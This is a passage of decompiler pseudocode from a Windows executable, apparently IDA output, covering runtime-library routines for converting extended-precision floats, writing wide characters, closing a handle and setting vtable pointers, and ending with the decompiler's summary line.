          v12 = v33 + 1 < v33;
          v34 = v33 + 1;
          if ( v12 || !v34 )
            v30 = 1;
        }
        v26 = 31 - (v62 + 1) % 32;
LABEL_56:
        v25 = (v62 + 1) / 32;
      }
      *(&v81 + v25) &= -1 << v26;
      v35 = v25 + 1;
      if ( v35 < 3 )
        memset(&v81 + v35, 0, 4 * (3 - v35));
      v68 = (dword_455AAC + 1) / 32;
      v36 = (dword_455AAC + 1) % 32;
      v37 = 0;
      v75 = 0;
      v63 = 0;
      do
      {
        v38 = *(&v81 + v37);
        *(&v81 + v63) = v75 | (v38 >> v36);
        v75 = (~(-1 << v36) & v38) << (32 - v36);
        v37 = v63 + 1;
        v63 = v37;
      }
      while ( v37 < 3 );
      v39 = &v83 - v68;
      for ( mm = 2; mm >= 0; --mm )
      {
        if ( mm < v68 )
          *(&v81 + mm) = 0;
        else
          *(&v81 + mm) = *v39;
        --v39;
      }
    }
    else
    {
      v81 = 0;
      v82 = 0;
      v83 = 0;
    }
    v5 = 0;
  }
  v2 = 2;
LABEL_83:
  v3 = a2;
LABEL_84:
  v52 = v81 | (v55 != 0 ? 0x80000000 : 0) | (v5 << (31 - dword_455AAC));
  if ( dword_455AB0 == 64 )
  {
    v53 = v82;
    v3[1] = v52;
    *v3 = v53;
  }
  else if ( dword_455AB0 == 32 )
  {
    *v3 = v52;
  }
  return v2;
}
// 455AA0: using guessed type int dword_455AA0;
// 455AA4: using guessed type int dword_455AA4;
// 455AA8: using guessed type int dword_455AA8;
// 455AAC: using guessed type int dword_455AAC;
// 455AB0: using guessed type int dword_455AB0;
// 455AB4: using guessed type int dword_455AB4;

//----- (0041D008) --------------------------------------------------------
int __cdecl sub_41D008(unsigned __int16 *a1, _DWORD *a2)
{
  int v2; // ebx
  _DWORD *v3; // edi
  int v4; // edx
  int v5; // esi
  int v6; // eax
  int v7; // edx
  char v8; // cl
  bool i; // zf
  int v10; // edx
  unsigned int v11; // eax
  bool v12; // cf
  unsigned int v13; // eax
  int v14; // ecx
  int j; // edx
  unsigned int v16; // eax
  int v17; // eax
  int v18; // ecx
  int v19; // eax
  char v20; // di
  unsigned int v21; // eax
  int *v22; // edx
  int v23; // eax
  int ii; // ecx
  int v25; // edx
  char v26; // cl
  bool jj; // zf
  int v28; // edx
  unsigned int v29; // eax
  int v30; // ecx
  unsigned int v31; // eax
  int kk; // edx
  unsigned int v33; // eax
  int v34; // eax
  int v35; // edx
  int v36; // ecx
  int v37; // eax
  unsigned int v38; // eax
  int *v39; // edx
  int mm; // ecx
  int v41; // ecx
  int v42; // edi
  unsigned int v43; // eax
  int v44; // edx
  int *v45; // edx
  int n; // ecx
  int v47; // ecx
  int k; // esi
  unsigned int v49; // eax
  int *v50; // edx
  int m; // ecx
  unsigned int v52; // esi
  int v53; // eax
  int v55; // [esp+Ch] [ebp-44h]
  int v56; // [esp+14h] [ebp-3Ch]
  int v57; // [esp+14h] [ebp-3Ch]
  unsigned int v58; // [esp+18h] [ebp-38h]
  char v59; // [esp+18h] [ebp-38h]
  int v60; // [esp+18h] [ebp-38h]
  int v61; // [esp+18h] [ebp-38h]
  int v62; // [esp+1Ch] [ebp-34h]
  int v63; // [esp+1Ch] [ebp-34h]
  int v64; // [esp+1Ch] [ebp-34h]
  char v65; // [esp+20h] [ebp-30h]
  int v66; // [esp+24h] [ebp-2Ch]
  int v67; // [esp+28h] [ebp-28h]
  int v68; // [esp+28h] [ebp-28h]
  char v69; // [esp+28h] [ebp-28h]
  int v70; // [esp+28h] [ebp-28h]
  int v71; // [esp+2Ch] [ebp-24h]
  unsigned int v72; // [esp+2Ch] [ebp-24h]
  int v73; // [esp+30h] [ebp-20h]
  int v74; // [esp+30h] [ebp-20h]
  int v75; // [esp+30h] [ebp-20h]
  int v76; // [esp+30h] [ebp-20h]
  int v77; // [esp+30h] [ebp-20h]
  int v78; // [esp+34h] [ebp-1Ch]
  int v79; // [esp+38h] [ebp-18h]
  int v80; // [esp+3Ch] [ebp-14h]
  int v81; // [esp+40h] [ebp-10h] BYREF
  int v82; // [esp+44h] [ebp-Ch]
  int v83; // [esp+48h] [ebp-8h] BYREF

  v2 = 0;
  v3 = a2;
  v55 = a1[5] & 0x8000;
  v4 = (a1[5] & 0x7FFF) - 0x3FFF;
  v81 = *(_DWORD *)(a1 + 3);
  v82 = *(_DWORD *)(a1 + 1);
  v73 = v4;
  v83 = *a1 << 16;
  if ( v4 == -16383 )
  {
    v5 = 0;
    v6 = 0;
    while ( !*(&v81 + v6) )
    {
      if ( ++v6 >= 3 )
        goto LABEL_84;
    }
    v81 = 0;
    v82 = 0;
    v83 = 0;
  }
  else
  {
    v71 = v4;
    v78 = v81;
    v62 = dword_455AC0 - 1;
    v66 = 0;
    v79 = v82;
    v80 = v83;
    v7 = dword_455AC0 / 32;
    v56 = dword_455AC0 / 32;
    v65 = 31 - dword_455AC0 % 32;
    v8 = v65;
    if ( ((1 << v65) & *(&v81 + dword_455AC0 / 32)) != 0 )
    {
      for ( i = (~(-1 << v65) & *(&v81 + v7)) == 0; i; i = *(&v81 + v7) == 0 )
      {
        if ( ++v7 >= 3 )
          goto LABEL_24;
      }
      v10 = v62 / 32;
      v66 = 0;
      v58 = 1 << (31 - v62 % 32);
      v11 = *(&v81 + v62 / 32);
      v12 = v11 + v58 < v11;
      v13 = v11 + v58;
      v14 = 0;
      if ( v12 || v13 < v58 )
      {
        v14 = 1;
        v66 = 1;
      }
      *(&v81 + v10) = v13;
      for ( j = v10 - 1; j >= 0; *(&v81 + j--) = v17 )
      {
        if ( !v14 )
          break;
        v16 = *(&v81 + j);
        v14 = 0;
        v66 = 0;
        v12 = v16 + 1 < v16;
        v17 = v16 + 1;
        if ( v12 || !v17 )
        {
          v14 = 1;
          v66 = 1;
        }
      }
      v8 = v65;
LABEL_24:
      v7 = v56;
    }
    *(&v81 + v7) &= -1 << v8;
    if ( v7 + 1 < 3 )
      memset(&v81 + v7 + 1, 0, 4 * (3 - (v7 + 1)));
    v18 = v73;
    if ( v66 )
      v18 = v73 + 1;
    if ( v18 >= dword_455ABC - dword_455AC0 )
    {
      if ( v18 > dword_455ABC )
      {
        if ( v18 < dword_455AB8 )
        {
          v81 &= ~0x80000000;
          v61 = v18 + dword_455ACC;
          v70 = dword_455AC4 / 32;
          v47 = dword_455AC4 % 32;
          v77 = 0;
          for ( k = 0; k < 3; ++k )
          {
            v49 = *(&v81 + k);
            *(&v81 + k) = v77 | (v49 >> v47);
            v77 = (~(-1 << v47) & v49) << (32 - v47);
          }
          v5 = v61;
          v50 = &v83 - v70;
          v2 = 0;
          for ( m = 2; m >= 0; --m )
          {
            if ( m < v70 )
              *(&v81 + m) = 0;
            else
              *(&v81 + m) = *v50;
            --v50;
          }
        }
        else
        {
          v82 = 0;
          v83 = 0;
          v81 = 0x80000000;
          v64 = dword_455AC4 / 32;
          v41 = dword_455AC4 % 32;
          v60 = dword_455AC4 % 32;
          v76 = 0;
          v42 = ~(-1 << (dword_455AC4 % 32));
          v69 = 32 - dword_455AC4 % 32;
          do
          {
            v43 = *(&v81 + v2);
            v44 = v76 | (v43 >> v41);
            LOBYTE(v41) = v60;
            *(&v81 + v2++) = v44;
            v76 = (v42 & v43) << v69;
          }
          while ( v2 < 3 );
          v45 = &v83 - v64;
          for ( n = 2; n >= 0; --n )
          {
            if ( n < v64 )
              *(&v81 + n) = 0;
            else
              *(&v81 + n) = *v45;
            --v45;
          }
          v5 = dword_455AB8 + dword_455ACC;
          v2 = 1;
        }
        goto LABEL_83;
      }
      v81 = v78;
      v82 = v79;
      v57 = (dword_455ABC - v71) / 32;
      v83 = v80;
      v19 = (dword_455ABC - v71) % 32;
      v74 = 0;
      v20 = v19;
      v67 = ~(-1 << v19);
      v59 = 32 - v19;
      do
      {
        v21 = *(&v81 + v2);
        *(&v81 + v2++) = v74 | (v21 >> v20);
        v74 = (v67 & v21) << v59;
      }
      while ( v2 < 3 );
      v22 = &v83 - v57;
      v23 = v57;
      for ( ii = 2; ii >= 0; --ii )
      {
        if ( ii < v23 )
        {
          *(&v81 + ii) = 0;
        }
        else
        {
          *(&v81 + ii) = *v22;
          v23 = v57;
        }
        --v22;
      }
      v25 = (v62 + 1) / 32;
      v26 = 31 - (v62 + 1) % 32;
      if ( ((1 << v26) & *(&v81 + v25)) != 0 )
      {
        for ( jj = (~(-1 << v26) & *(&v81 + v25)) == 0; jj; jj = *(&v81 + v25) == 0 )
        {
          if ( ++v25 >= 3 )
            goto LABEL_56;
        }
        v28 = v62 / 32;
        v29 = *(&v81 + v62 / 32);
        v30 = 0;
        v72 = 1 << (31 - v62 % 32);
        v12 = v29 + v72 < v29;
        v31 = v29 + v72;
        if ( v12 || v31 < v72 )
          v30 = 1;
        *(&v81 + v28) = v31;
        for ( kk = v28 - 1; kk >= 0; *(&v81 + kk--) = v34 )
        {
          if ( !v30 )
            break;
          v33 = *(&v81 + kk);
          v30 = 0;
          v12 = v33 + 1 < v33;
          v34 = v33 + 1;
          if ( v12 || !v34 )
            v30 = 1;
        }
        v26 = 31 - (v62 + 1) % 32;
LABEL_56:
        v25 = (v62 + 1) / 32;
      }
      *(&v81 + v25) &= -1 << v26;
      v35 = v25 + 1;
      if ( v35 < 3 )
        memset(&v81 + v35, 0, 4 * (3 - v35));
      v68 = (dword_455AC4 + 1) / 32;
      v36 = (dword_455AC4 + 1) % 32;
      v37 = 0;
      v75 = 0;
      v63 = 0;
      do
      {
        v38 = *(&v81 + v37);
        *(&v81 + v63) = v75 | (v38 >> v36);
        v75 = (~(-1 << v36) & v38) << (32 - v36);
        v37 = v63 + 1;
        v63 = v37;
      }
      while ( v37 < 3 );
      v39 = &v83 - v68;
      for ( mm = 2; mm >= 0; --mm )
      {
        if ( mm < v68 )
          *(&v81 + mm) = 0;
        else
          *(&v81 + mm) = *v39;
        --v39;
      }
    }
    else
    {
      v81 = 0;
      v82 = 0;
      v83 = 0;
    }
    v5 = 0;
  }
  v2 = 2;
LABEL_83:
  v3 = a2;
LABEL_84:
  v52 = v81 | (v55 != 0 ? 0x80000000 : 0) | (v5 << (31 - dword_455AC4));
  if ( dword_455AC8 == 64 )
  {
    v53 = v82;
    v3[1] = v52;
    *v3 = v53;
  }
  else if ( dword_455AC8 == 32 )
  {
    *v3 = v52;
  }
  return v2;
}
// 455AB8: using guessed type int dword_455AB8;
// 455ABC: using guessed type int dword_455ABC;
// 455AC0: using guessed type int dword_455AC0;
// 455AC4: using guessed type int dword_455AC4;
// 455AC8: using guessed type int dword_455AC8;
// 455ACC: using guessed type int dword_455ACC;

//----- (0042066C) --------------------------------------------------------
wint_t __cdecl sub_42066C(wchar_t Character)
{
  wint_t v1; // si

  _lock(3);
  v1 = _putwch_nolock(Character);
  _unlock(3);
  return v1;
}
// 406F9F: using guessed type _DWORD __cdecl _lock(_DWORD);
// 407129: using guessed type _DWORD __cdecl _unlock(_DWORD);

//----- (004255FE) --------------------------------------------------------
HANDLE sub_4255FE()
{
  HANDLE result; // eax

  result = hObject;
  if ( hObject != (HANDLE)-1 && hObject != (HANDLE)-2 )
    return (HANDLE)CloseHandle(hObject);
  return result;
}

//----- (0042744D) --------------------------------------------------------
void sub_42744D()
{
  off_454A98[0] = (void **)&off_44A848;
}
// 44A848: using guessed type int (__thiscall *off_44A848)(void *Block, char);
// 454A98: using guessed type void **off_454A98[3];

//----- (00427458) --------------------------------------------------------
void __cdecl sub_427458()
{
  off_454A9C[0] = (void **)&off_44A848;
}
// 44A848: using guessed type int (__thiscall *off_44A848)(void *Block, char);
// 454A9C: using guessed type void **off_454A9C[2];

//----- (00427463) --------------------------------------------------------
void __cdecl sub_427463()
{
  off_454AA0 = (void **)&off_44A848;
}
// 44A848: using guessed type int (__thiscall *off_44A848)(void *Block, char);
// 454AA0: using guessed type void **off_454AA0;

//----- (0042746E) --------------------------------------------------------
void sub_42746E()
{
  off_454A98[0] = (void **)&off_44A848;
}
// 44A848: using guessed type int (__thiscall *off_44A848)(void *Block, char);
// 454A98: using guessed type void **off_454A98[3];

//----- (00427479) --------------------------------------------------------
void sub_427479()
{
  off_454A9C[0] = (void **)&off_44A848;
}
// 44A848: using guessed type int (__thiscall *off_44A848)(void *Block, char);
// 454A9C: using guessed type void **off_454A9C[2];

//----- (00427484) --------------------------------------------------------
void sub_427484()
{
  off_454AA0 = (void **)&off_44A848;
}
// 44A848: using guessed type int (__thiscall *off_44A848)(void *Block, char);
// 454AA0: using guessed type void **off_454AA0;

//----- (0042748F) --------------------------------------------------------
void sub_42748F()
{
  off_454A98[0] = (void **)&off_44A848;
}
// 44A848: using guessed type int (__thiscall *off_44A848)(void *Block, char);
// 454A98: using guessed type void **off_454A98[3];

//----- (0042749A) --------------------------------------------------------
void sub_42749A()
{
  off_454A9C[0] = (void **)&off_44A848;
}
// 44A848: using guessed type int (__thiscall *off_44A848)(void *Block, char);
// 454A9C: using guessed type void **off_454A9C[2];

//----- (004274A5) --------------------------------------------------------
void sub_4274A5()
{
  off_454AA0 = (void **)&off_44A848;
}
// 44A848: using guessed type int (__thiscall *off_44A848)(void *Block, char);
// 454AA0: using guessed type void **off_454AA0;

// nfuncs=1056 queued=112 decompiled=112 lumina nreq=0 worse=0 better=0
// ALL OK, 112 function(s) have been successfully decompiled
